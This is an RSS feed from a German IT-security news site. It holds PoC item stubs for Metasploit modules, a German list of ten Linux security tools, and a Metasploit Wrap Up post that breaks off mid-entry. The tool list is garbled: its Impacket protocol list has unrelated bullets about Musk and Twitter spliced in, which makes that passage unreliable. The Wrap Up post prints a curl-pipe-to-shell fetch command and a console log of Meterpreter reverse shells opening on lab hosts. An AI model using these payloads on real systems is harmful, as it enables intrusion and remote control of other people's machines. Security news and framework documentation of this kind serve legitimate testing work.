<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=metasploit+wrapup+04172026%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Wed, 29 Jul 2026 02:13:20 +0200</lastBuildDate>
<pubDate>Wed, 29 Jul 2026 02:13:20 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=metasploit+wrapup+04172026%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=metasploit+wrapup+04172026%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Malicious XDG Desktop File]]></title>
<description><![CDATA[Topic: Malicious XDG Desktop File Risk: Medium Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></description>
<link>https://tsecurity.de/de/3693431/poc/malicious-xdg-desktop-file/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693431/poc/malicious-xdg-desktop-file/</guid>
<pubDate>Sat, 25 Jul 2026 10:05:02 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: Malicious XDG Desktop File Risk: Medium Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></content:encoded>
</item>
<item>
<title><![CDATA[Pandora ITSM Authenticated Command Injection]]></title>
<description><![CDATA[Topic: Pandora ITSM Authenticated Command Injection Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></description>
<link>https://tsecurity.de/de/3693429/poc/pandora-itsm-authenticated-command-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693429/poc/pandora-itsm-authenticated-command-injection/</guid>
<pubDate>Sat, 25 Jul 2026 10:04:59 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: Pandora ITSM Authenticated Command Injection Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></content:encoded>
</item>
<item>
<title><![CDATA[Sitecore XP Post-Authentication File Upload]]></title>
<description><![CDATA[Topic: Sitecore XP Post-Authentication File Upload Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></description>
<link>https://tsecurity.de/de/3693421/poc/sitecore-xp-post-authentication-file-upload/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693421/poc/sitecore-xp-post-authentication-file-upload/</guid>
<pubDate>Sat, 25 Jul 2026 10:04:48 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: Sitecore XP Post-Authentication File Upload Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></content:encoded>
</item>
<item>
<title><![CDATA[Commvault CLI Argument Injection / Traversal / Remote Code Execution]]></title>
<description><![CDATA[Topic: Commvault CLI Argument Injection / Traversal / Remote Code Execution Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></description>
<link>https://tsecurity.de/de/3693420/poc/commvault-cli-argument-injection-traversal-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693420/poc/commvault-cli-argument-injection-traversal-remote-code-execution/</guid>
<pubDate>Sat, 25 Jul 2026 10:04:46 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: Commvault CLI Argument Injection / Traversal / Remote Code Execution Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></content:encoded>
</item>
<item>
<title><![CDATA[Vvveb CMS 1.0.5 Remote Code Execution]]></title>
<description><![CDATA[Topic: Vvveb CMS 1.0.5 Remote Code Execution Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></description>
<link>https://tsecurity.de/de/3693417/poc/vvveb-cms-105-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693417/poc/vvveb-cms-105-remote-code-execution/</guid>
<pubDate>Sat, 25 Jul 2026 10:04:42 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: Vvveb CMS 1.0.5 Remote Code Execution Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></content:encoded>
</item>
<item>
<title><![CDATA[10 Linux-Pflicht-Tools für Netzwerk- und Security-Profis]]></title>
<description><![CDATA[Wir haben zehn essenzielle Open-Source-Security-Tools für Sie zusammengestellt. 
					Foto: Omelchenko – shutterstock.com




Eine Wahl zu treffen, wenn Dutzende oder gar Hunderte von Tools zur Verfügung stehen, ist nicht einfach. So dürfte es auch vielen Netzwerk- und Security-Experten gehen, di...]]></description>
<link>https://tsecurity.de/de/3687932/it-security-nachrichten/10-linux-pflicht-tools-fuer-netzwerk-und-security-profis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687932/it-security-nachrichten/10-linux-pflicht-tools-fuer-netzwerk-und-security-profis/</guid>
<pubDate>Thu, 23 Jul 2026 06:09:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Wir haben zehn essenzielle Open-Source-Security-Tools für Sie zusammengestellt. " title="Wir haben zehn essenzielle Open-Source-Security-Tools für Sie zusammengestellt. " src="https://images.computerwoche.de/bdb/3340356/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Wir haben zehn essenzielle Open-Source-Security-Tools für Sie zusammengestellt. </p></figcaption></figure><p class="imageCredit">
					Foto: Omelchenko – shutterstock.com</p></div>




<p class="wp-block-paragraph">Eine Wahl zu treffen, wenn Dutzende oder gar Hunderte von Tools zur Verfügung stehen, ist nicht einfach. So dürfte es auch vielen Netzwerk- und <a href="https://www.csoonline.com/de/" title="Security-Experten" target="_blank">Security-Experten</a> gehen, die quelloffene Security Tools für <a href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank" class="idgGlossaryLink">Linux</a> suchen.</p>



<p class="wp-block-paragraph">In diesem Bereich gibt es eine Vielzahl verschiedener Tools für so gut wie jede Aufgabe (Netzwerk-Tunneling, Sniffing, Scanning, Mapping) und jede Umgebung (Wi-Fi-Netzwerke, Webanwendungen, Datenbankserver). Wir haben einige Experten konsultiert und zehn essenzielle <a href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank" class="idgGlossaryLink">Linux</a>-Sicherheitstools für Sie zusammengestellt.</p>



<h2 class="wp-block-heading">1. <a href="https://www.aircrack-ng.org/" target="_blank" rel="noreferrer noopener">Aircrack-ng</a></h2>



<p class="wp-block-paragraph">Diese Suite von Software Tools ermöglicht es, drahtlose Netzwerke und WiFi-Protokolle Sicherheitsüberprüfungen zu unterziehen. Sicherheitsprofis verwenden das Tool für die Netzwerkadministration, Hacking und Penetrationstests. Dabei fokussiert Aircrack-ng auf:</p>



<ul class="wp-block-list">
<li><p>Monitoring (Datenpakete erfassen und Daten in Textdateien zur Weiterverarbeitung durch Tools von Drittanbietern exportieren)</p></li>



<li><p>Angreifen (Replay-Angriffe, Deauthentication, Packet Injection)</p></li>



<li><p>Testing (WiFi-Karten und Treiberfunktionen überprüfen) und</p></li>



<li><p>Cracking (WEP und WPA PSK)</p></li>
</ul>



<p class="wp-block-paragraph">Laut der <a href="https://www.aircrack-ng.org/" title="offiziellen Webseite" target="_blank" rel="noopener">offiziellen Webseite</a> funktionieren alle Tools kommandozeilenbasiert, was eine umfangreiche Skripterstellung ermöglicht. Das Tool funktioniert mit <a href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank" class="idgGlossaryLink">Linux</a> genauso wie mit <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>, macOS, FreeBSD, OpenBSD, NetBSD, Solaris und sogar eComStation.</p>



<p class="wp-block-paragraph"><strong>Preis:</strong> kostenlos</p>



<h2 class="wp-block-heading">2. <a href="https://portswigger.net/burp/pro" target="_blank" rel="noreferrer noopener">Burp Suite</a></h2>



<p class="wp-block-paragraph">Hierbei handelt es sich um eine Testing-Suite für Webanwendungen, die für Security Assessments von Websites eingesetzt wird. Burp Suite arbeitet als lokale Proxy-Lösung, die es Sicherheitsexperten ermöglicht, Anfragen (HTTP/Websockets) und Antworten zwischen einem Webserver und einem Browser</p>



<ul class="wp-block-list">
<li><p>entschlüsseln,</p></li>



<li><p>beobachten,</p></li>



<li><p>manipulieren und</p></li>



<li><p>wiederholen zu können.</p></li>
</ul>



<p class="wp-block-paragraph">Burp Suite hat einen passiven Scanner an Bord, mit dem Security-Profis Webseiten (manuell) auf potenzielle Schwachstellen überprüfen können. Die Pro-Version bietet außerdem einen sehr nützlichen aktiven Web-Schwachstellen-Scanner, mit dem sich weitere Schwachstellen aufspüren lassen. Burp Suite ist über Plugins erweiterbar, so dass Sicherheitsexperten ihre eigenen Erweiterungen entwickeln können.</p>



<p class="wp-block-paragraph"><strong>Preis:</strong> Die Professional-Version kostet 475 Euro pro Jahr und Benutzer. Darüber hinaus steht auch eine Enterprise-Version (ab ca. 2.000 Euro jährlich) zur Verfügung, die mehrere gleichzeitige Scans ermöglicht und von Anwendungsentwicklungsteams genutzt werden kann.</p>



<h2 class="wp-block-heading">3. <a href="https://github.com/fortra/impacket" target="_blank" rel="noreferrer noopener">Impacket</a></h2>



<p class="wp-block-paragraph">Diese Sammlung von Tools ist für Pen-Tests von Netzwerkprotokollen und -diensten unerlässlich. Impacket wurde von SecureAuth entwickelt und ist eine Sammlung von Python Classes, um mit Netzwerkprotokollen zu arbeiten. Impacket konzentriert sich auf die Bereitstellung von Low-Level-Zugriff auf Pakete und bei einigen Protokollen wie SMB1-3 und MSRPC auf die Protokollimplementierung selbst. Sicherheitsexperten können Pakete von Grund auf neu konstruieren, aber auch auf Grundlage geparster Rohdaten. Die objektorientierte <a title="API" href="https://www.computerwoche.de/article/2790525/was-sie-ueber-application-programming-interfaces-wissen-muessen.html" target="_blank">API</a> macht es zudem einfach, mit tiefen Protokollhierarchien zu arbeiten. Impacket unterstützt die folgenden Protokolle:</p>



<ul class="wp-block-list">
<li><p>Ethernet, Linux;</p></li>



<li><p>IP, TCP, UDP, ICMP, IGMP, ARP;</p></li>



<li><p>IPv4 und IPv6;</p></li>



<li><p>Umgänglicher zeigte sich Musk gegenüber den Anzeigenkunden von Twitter. In einem – natürlich auf Twitter geposteten – Brief erklärte der Tesla-Chef, der Grund für die Übernahme sei nicht, damit noch mehr Geld zu verdienen. Vielmehr sei es “wichtig für den Fortbestand der Zivilisation, einen gemeinsamen digitalen Treffpunkt zu haben, auf dem eine breite Palette von Überzeugungen auf gesunde Weise diskutiert werden kann.” </p></li>



<li><p>Trotz alledem dürfe Twitter nicht zu einer “für alle Nutzer freien Höllenlandschaft werden, in der alles ohne Konsequenzen gesagt werden kann”, fügte Musk hinzu. Zusätzlich zur Einhaltung der Gesetze müsse die Plattform “warmherzig und einladend” für alle sein und den Nutzern die Möglichkeit bieten, “die gewünschte Erfahrung nach ihren Vorlieben zu wählen” – ähnlich wie man zum Beispiel wählen kann, Filme zu sehen oder Videospiele zu spielen, die für alle Altersgruppen geeignet sind.</p></li>



<li><p>Plain-, NTLM- und Kerberos-Authentifizierungen, unter Verwendung von Kennwörtern/Hashes/Tickets/Schlüsseln;</p></li>



<li><p>EU-Kommissar Thierry Breton wiederum reagierte auf Musks Teet, dass der Vogel jetzt frei sein, mit der Anmerkung, “dass Twitter in Europa nach unseren Regeln fliegen muss”.</p></li>
</ul>



<p class="wp-block-paragraph"><strong>Preis:</strong> Kostenlos – Impacket wird unter einer leicht modifizierten Version der Apache Software License bereitgestellt. Die Unterschiede können Sie <a href="https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/LICENSE" title="hier einsehen" target="_blank" rel="noopener">hier einsehen</a>.</p>



<h2 class="wp-block-heading">4. <a href="https://www.metasploit.com/" target="_blank" rel="noreferrer noopener">Metasploit</a></h2>



<p class="wp-block-paragraph">Metasploit ist ein Exploit-Framework von Rapid7, das für allgemeine Penetrationstests und Schwachstellenbewertungen verwendet wird. Sicherheitsexperten betrachten es als “Super-Tool”, das funktionierende Versionen fast aller bekannter Exploits enthält. Metasploit ermöglicht Sicherheitsexperten, Netzwerke und Endpunkte auf Schwachstellen zu scannen und anschließend automatisiert mögliche Exploits auszuführen, um Systeme zu übernehmen.</p>



<p class="wp-block-paragraph">Metasploit erleichtert es mit protokollspezifischen Modulen (die alle unter der Funktion Auxiliary/Server/Capture laufen) Anmeldeinformationen zu erfassen. Sicherheitsexperten können jedes dieser Module einzeln starten und konfigurieren – zudem steht ein Capture-Plug-in zur Verfügung, das diesen Prozess vereinheitlicht.</p>



<p class="wp-block-paragraph"><strong>Preis:</strong> Metasploit Pro kostet – inklusive kommerziellem Support durch Rapid7 – ab 12.000 Dollar pro Jahr. Es gibt aber auch eine kostenlose Version.</p>



<h2 class="wp-block-heading">5. <a href="https://nmap.org/ncat/" target="_blank" rel="noreferrer noopener">Ncat</a></h2>



<p class="wp-block-paragraph">Der Nachfolger des beliebten Tools Netcat heißt Ncat und kommt von den Machern von Nmap. Das Tool ermöglicht es, Daten per Kommandozeile über ein Netzwerk zu lesen und zu schreiben, bietet aber auch zusätzlich Funktionen wie SSL-Verschlüsselung. Sicherheitsexperten zufolge ist Ncat unerlässlich geworden, um TCP/UDP-Clients und -Server zu hosten und Daten von Angreifer- und Opfersystemen zu empfangen.</p>



<p class="wp-block-paragraph">Ncat ist auch ein beliebtes Tool, um eine Reverse Shell einzurichten oder Daten zu exfiltrieren. Es wurde als zuverlässiges Back-End-Tool entwickelt, um Netzwerkverbindungen zu anderen Anwendungen und Benutzern herzustellen.</p>



<p class="wp-block-paragraph"><strong>Preis:</strong> kostenlos</p>



<h2 class="wp-block-heading">6. <a href="https://nmap.org/" target="_blank" rel="noreferrer noopener">Nmap</a></h2>



<p class="wp-block-paragraph">Dieses Netzwerk-Scanning- und Mapping-Tool auf Kommandozeilen-Basis findet zugängliche Ports auf Remote Devices. Viele Sicherheitsexperten halten Nmap für eines der wichtigsten und effektivsten Tools – insbesondere im Bereich Penetration Testing ist es unerlässlich.</p>



<p class="wp-block-paragraph">Die Skripting-Engine von Nmap erkennt anschließend automatisiert weitere Schwachstellen und nutzt diese aus. Nmap unterstützt Dutzende fortschrittlicher Techniken, um Netzwerke mit IP-Filtern, Firewalls, Routern und anderen Hindernissen abzubilden. Dazu gehören auch zahlreiche Mechanismen, um TCP- und UDP-Ports zu scannen, Betriebssysteme und Versionen sowie Ping-Sweeps zu erkennen.</p>



<p class="wp-block-paragraph"><strong>Preis:</strong> kostenlos</p>



<h2 class="wp-block-heading">7. <a href="https://github.com/haad/proxychains" target="_blank" rel="noreferrer noopener">ProxyChains</a></h2>



<p class="wp-block-paragraph">Dieses Werkzeug – der De-facto-Standard für Netzwerk-Tunneling – ermöglicht es Sicherheitsexperten, Proxy-Befehle von ihrem angreifenden <a href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank" class="idgGlossaryLink">Linux</a>-Rechner aus über verschiedene kompromittierte Rechner zu senden, um Netzwerkgrenzen und Firewalls zu überwinden und dabei einer Entdeckung zu entgehen.</p>



<p class="wp-block-paragraph">ProxyChains leitet den TCP-Verkehr von Penetrationstestern durch die folgenden Proxys: TOR, SOCKS und HTTP. ProxyChains ist mit TCP-Aufklärungs-Tools wie NMAP kompatibel und verwendet standardmäßig das TOR-Netzwerk. Sicherheitsexperten verwenden ProxyChains auch bei der IDS/IPS-Erkennung.</p>



<p class="wp-block-paragraph"><strong>Preis:</strong> kostenlos</p>



<h2 class="wp-block-heading">8. <a href="https://github.com/SpiderLabs/Responder" target="_blank" rel="noreferrer noopener">Responder</a></h2>



<p class="wp-block-paragraph">Responder ist ein NBT-NS (NetBIOS Name Service), LLMNR (Link-Local Multicast Name Resolution) und mDNS (Multicast DNS) Poisoner. Penetration Tester nutzen das Tool, um Angriffe zu simulieren, die darauf abzielen, Anmeldeinformationen und andere Daten während des Prozesses der Namensauflösung zu stehlen, wenn der DNS-Server keinen Eintrag findet. Ab Version 3.1.1.0 bietet Responder standardmäßig vollen IPv6-Support.</p>



<p class="wp-block-paragraph"><strong>Preis:</strong> kostenlos</p>



<h2 class="wp-block-heading">9. <a href="https://sqlmap.org/" target="_blank" rel="noreferrer noopener">sqlmap</a></h2>



<p class="wp-block-paragraph">Das <a class="idgGlossaryLink" href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank">Open-Source</a>-Tool sqlmap richtet sich ebenfalls an Penetrationstester und automatisiert den Prozess, SQL-Injection-Fehler zu erkennen, mit deren Hilfe Datenbankserver kompromittiert werden könnten. Das Tool verfügt über eine leistungsstarke Erkennungs-Engine und bietet zahlreiche Funktionen, darunter Datenbank-Fingerprinting und die Ausführung von Befehlen auf Betriebssystemebene über Out-of-Band-Verbindungen.</p>



<p class="wp-block-paragraph">Sqlmap unterstützt eine breite Palette von Datenbankservern, darunter:</p>



<ul class="wp-block-list">
<li><p>MySQL,</p></li>



<li><p>Oracle,</p></li>



<li><p>PostgreSQL,</p></li>



<li><p>Microsoft SQL Server,</p></li>



<li><p>Microsoft Access,</p></li>



<li><p>IBM DB2,</p></li>



<li><p>SQLite,</p></li>



<li><p>Firebird,</p></li>



<li><p>Sybase,</p></li>



<li><p>SAP MaxDB und</p></li>



<li><p>HSQLDB.</p></li>
</ul>



<p class="wp-block-paragraph"><strong>Preis:</strong> kostenlos</p>



<h2 class="wp-block-heading">10. <a href="https://www.wireshark.org/" target="_blank" rel="noreferrer noopener">Wireshark</a></h2>



<p class="wp-block-paragraph">Das Netzwerkprotokoll-Analyse-Tool Wireshark wird auch oft als Network Interface Sniffer bezeichnet. Mit Wireshark können Sicherheitsexperten das Netzwerkverhalten eines Geräts beobachten, um zu sehen, mit welchen anderen Geräten es kommuniziert und warum.</p>



<p class="wp-block-paragraph">Sicherheitsexperten zufolge eignet sich Wireshark hervorragend, um herauszufinden, wo sich DNS-Server und andere Dienste befinden, mit denen sich ein Netzwerk weiter kompromittieren lässt. Wireshark läuft nicht nur unter <a href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank" class="idgGlossaryLink">Linux</a>, sondern funktioniert mit den allen gängigen Betriebssystemen, einschließlich <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>, MacOs und Unix.</p>



<p class="wp-block-paragraph"><strong>Preis:</strong> kostenlos </p>



<p class="wp-block-paragraph">(fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Beitrag ist <a href="https://www.networkworld.com/article/970926/10-essential-linux-security-tools-for-network-professionals-and-security-practitioners.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Networkworld.com erschienen.</strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Amazons Alexa+ im Test: Damit hätte Captain Kirk die USS Enterprise nicht steuern können]]></title>
<description><![CDATA[KI-Bilderkennung in Python - Deep Learning mit Keras: virtueller Drei-Tage- · Exklusiv: IT-Security Komplettpaket: Ethical Hacking & Metasploit (7 E- ...]]></description>
<link>https://tsecurity.de/de/3678245/it-security-nachrichten/amazons-alexa-im-test-damit-haette-captain-kirk-die-uss-enterprise-nicht-steuern-koennen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678245/it-security-nachrichten/amazons-alexa-im-test-damit-haette-captain-kirk-die-uss-enterprise-nicht-steuern-koennen/</guid>
<pubDate>Sat, 18 Jul 2026 18:40:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[KI-Bilderkennung in Python - Deep Learning mit Keras: virtueller Drei-Tage- · Exklusiv: <b>IT</b>-<b>Security</b> Komplettpaket: Ethical Hacking &amp; Metasploit (7 E- ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap Up: An HTTP to SMB relay plus Payload Improvements]]></title>
<description><![CDATA[Metasploit Wrap Up HousekeepingWhile the Metasploit Framework will be continuing its weekly release cadence, bringing you dear reader our latest content, the Weekly Wrap Up is being shifted to a bi-weekly cadence. The team is planning to use the additional time between posts to record demos of so...]]></description>
<link>https://tsecurity.de/de/3676924/it-security-nachrichten/metasploit-wrap-up-an-http-to-smb-relay-plus-payload-improvements/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676924/it-security-nachrichten/metasploit-wrap-up-an-http-to-smb-relay-plus-payload-improvements/</guid>
<pubDate>Fri, 17 Jul 2026 21:52:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Metasploit Wrap Up Housekeeping</h2><p>While the Metasploit Framework will be continuing its weekly release cadence, bringing you dear reader our latest content, the Weekly Wrap Up is being shifted to a bi-weekly cadence. The team is planning to use the additional time between posts to record demos of some of the more exciting content. Stay tuned for the next generation of Metasploit Wrap Ups and be sure to subscribe to the <a href="https://www.rapid7.com/blog/tag/metasploit/rss/">RSS Feed</a> to be alerted when new blogs are released.</p><h2>Fetch Multi: Just Fetch and Forget?</h2><p>Our very own <a href="https://github.com/bwatters-r7">bwatters-r7</a> continued to enhance our Fetch Payloads implementation. This time adding a new Linux Fetch Multi payload family that supports on-the-fly Linux architecture identification. Standard Fetch payloads produce a command that will download and execute a specific binary payload on a target, but the new Linux Fetch Multi family will report the architecture of the target host when it requests the payload, and the handler will automatically serve the correct elf architecture payload for the given target. It means that if a user is exploiting a Linux host, they do not need to guess the target’s architecture when selecting a payload. It also means that one payload and one handler can serve across multiple targets of differing architectures. Since these payloads work by adding a query string, only HTTP and HTTPS-based fetch payloads support Fetch Multi payloads.</p><p>Here is an example of the same payload and handler identifying and delivering the proper elf architecture payloads to a mipsel host, a mips64 host, and an aarch64 host by just executing the command <span data-type="inlineCode">curl -s http://10.5.135.210:8080/x|sh</span> on each target.</p><p></p><pre>msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt; show options
Module options (payload/cmd/linux/http/multi/meterpreter_reverse_tcp):
   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, GET, TFTP, TNFTP,
                                               WGET)
   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous
                                              handles, requires Linux ≥3.17 (for Python variant also Python ≥3
                                              .8, tested shells are sh, bash, zsh) (Accepted: none, python3.8+
                                              , shell-search, shell)
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH   x                no        Local URI to use for serving payload
   LHOST           10.5.135.210     yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port
   When FETCH_COMMAND is one of CURL,GET,WGET:
   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  true             yes       Host both the binary payload and the command so it can be piped dire
                                          ctly to the shell.
   When FETCH_FILELESS is none:
   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      cldOGvRDplZ      no        Name to use on remote system when storing payload; cannot co
                                                  ntain spaces or slashes
   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces
View the full module info with the info, or info -d command.
msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt; to_handler
[*] Command to execute on target: curl -s http://10.5.135.210:8080/x|sh
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 10.5.135.210:8080
[*] HTTP server started
[*] Adding resource /csmCra8lnQTHxFXkipQC0w
[*] Adding resource /x
[*] Started reverse TCP handler on 10.5.135.210:4444 
msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt; [*] Client 10.5.132.212 requested /x
[*] Sending payload to 10.5.132.212 (curl/8.13.0-rc3)
[*] Client 10.5.132.212 requested /csmCra8lnQTHxFXkipQC0w?arch=armv7l
[*] Sending payload to 10.5.132.212 (curl/8.13.0-rc3)
[*] Dynamic Payload Detected, expecting a Query String in the request...
[*] Building payload for armle arch
[*] Meterpreter session 1 opened (10.5.135.210:4444 -&gt; 10.5.132.212:45068) at 2026-07-14 11:33:18 -0500
[*] Client 10.5.132.214 requested /x
[*] Sending payload to 10.5.132.214 (curl/8.11.0)
[*] Client 10.5.132.214 requested /csmCra8lnQTHxFXkipQC0w?arch=aarch64
[*] Sending payload to 10.5.132.214 (curl/8.11.0)
[*] Dynamic Payload Detected, expecting a Query String in the request...
[*] Building payload for aarch64 arch
[*] Meterpreter session 2 opened (10.5.135.210:4444 -&gt; 10.5.132.214:39894) at 2026-07-14 11:33:26 -0500
[*] Client 10.5.132.224 requested /x
[*] Sending payload to 10.5.132.224 (curl/7.52.1)
[*] Client 10.5.132.224 requested /csmCra8lnQTHxFXkipQC0w?arch=mips64
[*] Sending payload to 10.5.132.224 (curl/7.52.1)
[*] Dynamic Payload Detected, expecting a Query String in the request...
[*] Building payload for mips64 arch
[*] Meterpreter session 3 opened (10.5.135.210:4444 -&gt; 10.5.132.224:53506) at 2026-07-14 11:33:41 -0500
msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt; sessions -C sysinfo
[*] Running 'sysinfo' on meterpreter session 1 (10.5.132.212)
Computer     : kali-raspberrypi
OS           : Debian  (Linux 5.15.44-Re4son-v7+)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : cmd/linux
[*] Running 'sysinfo' on meterpreter session 2 (10.5.132.214)
Computer     : kali-raspberrypi
OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : cmd/linux
[*] Running 'sysinfo' on meterpreter session 3 (10.5.132.224)
Computer     : ubnt
OS           : Debian 9.13 (Linux 4.9.79-UBNT)
Architecture : mips64
BuildTuple   : mips64-linux-muslsf
Meterpreter  : cmd/linux
msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt;</pre><h2>RISC architecture is going to change everything!</h2><p>Speaking of juggling multiple architectures, <a href="https://github.com/bcoles">bcoles</a> added support for yet another IoT arch: RiscV. The change adds staged and stageless shell payloads for both 32- and 64-bit RiscV systems, and dovetails well with his other PR adding XOR encoders for RiscV payloads.</p><h2>New module content (4)</h2><h3>Microsoft Windows HTTP to SMB Relay</h3><p>Author: jheysel-r7</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21620">#21620</a> contributed by <a href="https://github.com/jheysel-r7">jheysel-r7</a></p><p>Path: server/relay/http_to_smb</p><p>Description: Adds an HTTP to SMB Relay server module allowing users to relay an incoming NTLM HTTP authentication request to multiple SMB servers in order to establish SMB session on the target hosts to be used by the framework.</p><h3>Byte XORi Encoder</h3><p>Author: bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a></p><p>Type: Encoder</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21235">#21235</a> contributed by <a href="https://github.com/bcoles">bcoles</a></p><p>Path: riscv32le/byte_xori</p><p>Description: Add four encoder variants for both RISC-V 32-bit and 64-bit little-endian architectures.</p><h3>FTP, HTTP, HTTPS and METERPRETER_REVERSE_TCP Fetch, Linux Chmod</h3><p>Authors: Brendan Watters, Spencer McIntyre, and bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a></p><p>Type: Payload (Adapter)</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21384">#21384</a> contributed by <a href="https://github.com/bwatters-r7">bwatters-r7</a></p><p>Description: Adds Linux fetch multi payloads, a fetch server for FTP-based fetch payloads, a TFTP server to rex/proto to align with our other servers.</p><p>This adapter adds 421 new payloads for all Linux and Windows architectures including:</p><ul><li>cmd/linux/ftp/aarch64/chmod</li><li>cmd/linux/ftp/x86/meterpreter/reverse_tcp</li><li>cmd/windows/ftp/aarch64/meterpreter_reverse_http</li></ul><h3>FTP Fetch, 